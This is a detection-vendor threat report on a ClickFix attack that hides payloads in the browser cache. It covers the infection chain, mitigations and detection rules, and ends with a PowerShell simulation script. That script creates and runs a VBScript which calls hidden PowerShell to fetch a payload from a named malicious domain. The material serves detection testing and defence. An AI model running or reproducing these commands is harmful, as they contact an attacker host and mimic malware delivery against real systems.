SOC Prime Bias: High

09 Oct 2026 07:40 UTC

ClickFix Attack Delivers Payloads via Browser Cache

Author Photo
SOC Prime Team linkedin icon Follow
ClickFix Attack Delivers Payloads via Browser Cache
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A new ClickFix attack variation uses compromised websites to pre-fetch malicious scripts into a web browser’s cache, disguised as legitimate files like PNGs. Victims are social engineered into executing commands via the Windows Run dialog, which then triggers the execution of the cached payload to bypass character limits and security controls. This technique eventually leads to credential theft through memory injection into legitimate processes.

Investigation

Microsoft Threat Intelligence and other researchers identified a multi-stage infection chain involving VBScript, PowerShell, and .NET assemblies. The attack chain uses browser cache smuggling to hide payloads and employs WMI to harvest host information. The investigation highlighted the use of legitimate system tools like cmd.exe, wscript.exe, and timeout.exe to facilitate the attack.

Mitigation

Organizations should implement cloud-delivered, web, and network protection alongside application control and PowerShell script-block logging. Users should be educated to never paste commands into Windows Run, Terminal, or PowerShell when prompted by website errors or CAPTCHAs. Monitoring for suspicious browser activity and WScript/PowerShell child processes is also recommended.

Response

Upon detection, hunt for suspicious activities in the RunMRU registry key and monitor for unusual scheduled tasks. Investigate child processes spawned from WScript or PowerShell and check for unauthorized .NET assemblies loaded into memory. Isolate affected systems and review network logs for outbound connections to known malicious domains.

Attack Flow

We are still updating this part.

Detections

Possible Execution by Use of Short Script Name (via cmdline)

SOC Prime Team
08 Oct 2026

Possible Hands-on or Scripting Operation was Performed in Unusual Folders (via cmdline)

SOC Prime Team
08 Oct 2026

LOLBAS WScript / CScript (via process_creation)

SOC Prime Team
08 Oct 2026

Detection of PowerShell and VBScript Execution via Browser Cache Smuggling [Windows Powershell]

SOC Prime AI Rules
08 Oct 2026

Simulation Execution

  • Attack Narrative & Commands: The adversary leverages a social engineering tactic where a user is prompted to “fix” a browser error. This process smuggles a malicious VBScript into a temporary directory (simulating the browser cache). The adversary then executes this VBScript using wscript.exe. The VBScript is crafted to call PowerShell with the -WindowStyle Hidden flag to avoid user detection and attempts to connect to the domain capsysnet.vg to fetch a secondary payload. This sequence is designed to trigger the specific string-based detection logic in the rule.

  • Regression Test Script:

    # Simulation Script: ClickFix Payload Smuggling Mimicry
    $tempDir = $env:TEMP
    $vbsPath = Join-Path $tempDir "malicious_smuggled.vbs"
    
    # Create a VBScript that simulates the malicious behavior
    # It attempts to call PowerShell with the specific string the rule looks for
    # and references the suspicious domain.
    $vbsContent = @"
    Set objShell = CreateObject("WScript.Shell")
    ' Simulate calling a script named v.ps1 with hidden window style
    ' and connecting to the suspicious domain
    objShell.Run "powershell.exe -File v.ps1 -WindowStyle Hidden -Url http://capsysnet.vg/payload.exe", 0, True
    "@
    
    Set-Content -Path $vbsPath -Value $vbsContent
    
    Write-Host "[+] Malicious VBScript created at: $vbsPath"
    Write-Host "[+] Executing VBScript via wscript.exe to trigger detection..."
    
    # Execute the VBScript
    Start-Process "wscript.exe" -ArgumentList "`"$vbsPath`""
    
    Write-Host "[+] Simulation command sent. Check SIEM for alerts."
  • Cleanup Commands:

    # Cleanup: Remove the simulated malicious files
    $tempDir = $env:TEMP
    $vbsPath = Join-Path $tempDir "malicious_smuggled.vbs"
    if (Test-Path $vbsPath) {
        Remove-Item -Path $vbsPath -Force
        Write-Host "[+] Cleanup complete: $vbsPath removed."
    } else {
        Write-Host "[!] Cleanup failed: File not found."
    }